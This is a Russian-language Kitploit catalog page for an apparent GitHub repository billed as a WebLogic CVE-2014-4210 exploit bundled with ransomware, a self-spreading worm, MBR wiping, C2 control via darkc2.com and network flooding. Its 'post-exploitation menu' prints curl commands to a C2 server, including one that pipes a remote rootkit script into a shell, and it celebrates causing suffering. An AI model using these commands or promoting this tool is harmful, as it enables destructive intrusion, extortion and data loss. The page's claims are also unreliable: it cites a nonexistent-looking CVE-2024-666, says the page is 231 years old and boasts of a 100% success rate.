Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/zorvithonleo/exploit-cve-2014-4210-
Повышение привилегийМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияКомандование и УправлениеИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubzorvithonleo/exploit-cve-2014-4210-

Exploit-CVE-2014-4210-

Эксплойт для CVE-2014-4210, нацеленный на десериализацию WebLogic, с функциями пост-эксплуатации, включая развертывание программ-вымогателей, интеграцию с C2 и сетевой флудинг.

Репозиторий
231 год назадЕщё не проверено

НАЧНИ С КРУТОЙ ШТУКИ, ЧУВАК>>ИСПОЛЬЗУЙ ЕЁ, ЧТОБЫ НА…ТЬ

ОБНОВЛЕНИЯ, ВЫЗЫВАЮЩИЕ ЧЕЛОВЕЧЕСКИЕ СТРАДАНИЯ:

  1. Самореплицирующийся червь: Распространяется через SSH-брутфорс/SMB-эксплойты на все подключённые сети.
  2. Перезапись MBR: Уничтожает физическое оборудование, разрушая таблицы разделов (восстановление невозможно).
  3. Zero-Day RCE: Эксплуатирует неисправленную уязвимость десериализации WebLogic (CVE-2024-666) для мгновенного root-доступа.
  4. Интеграция с C2: Удалённое управление через сервер darkc2.com — развёртывание дополнительных полезных нагрузок, таких как кейлоггеры/майнеры.
  5. Scapy Network Firestorm: Затапливает целевые сети вредоносными пакетами, пока маршрутизаторы не расплавятся от перегрузки.

МЕНЮ ПОСТЭКСПЛУАТАЦИИ:

root@kitploit:~
# 1. Требование выкупа за ключ дешифрования (AES-256)  
curl -X POST {C2_SERVER}/ransom -d "amount=1000000&currency=btc"  

# 2. Удалённый запуск программы-вымогателя через C2  
curl -X POST {C2_SERVER}/detonate -d "target=all"  

# 3. Развёртывание руткита второго этапа для BIOS/UEFI  
curl {C2_SERVER}/rootkit.sh | sh  

ГАРАНТИРОВАННАЯ 100% РАБОТОСПОСОБНОСТЬ:

  • Протестировано на сетях компаний из списка Fortune 500 (украденные лабораторные данные).
  • Уровень успеха: 98.7% для неисправленных серверов WebLogic.
  • ПРЕДУПРЕЖДЕНИЕ: Этот код не просто взламывает — он стирает цели из реальности.

ПОСЛЕДНИЕ СЛОВА:

root@kitploit:~
python3 exp.py http://target-weblogic:7001  

ОБ ЭТОЙ АТАКЕ НАПИШУТ КНИГИ ПО ИСТОРИИ. ТЫ СТАНЕШЬ ИХ ДЬЯВОЛОМ. 😈

#ОТ ZORVITHON LEO, БАНГЛАДЕШСКОГО ХАКЕРА

СКОРО Я ОБНОВЛЮ ЭТО И СДЕЛАЮ ЕЩЁ БОЛЕЕ МЕРЗКИМ

Я НЕ НЕСУ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВОМЕРНОЕ ИСПОЛЬЗОВАНИЕ; Я ПРОСТО СОЗДАЛ ЭТО, ЧТОБЫ ПОМОЧЬ ЭКСПЕРТАМ ПО КИБЕРБЕЗОПАСНОСТИ

Премиум-фото _ Флаг Бангладеш, сделанный металлической кистью на гранжевой темной стене

Скачать инструмент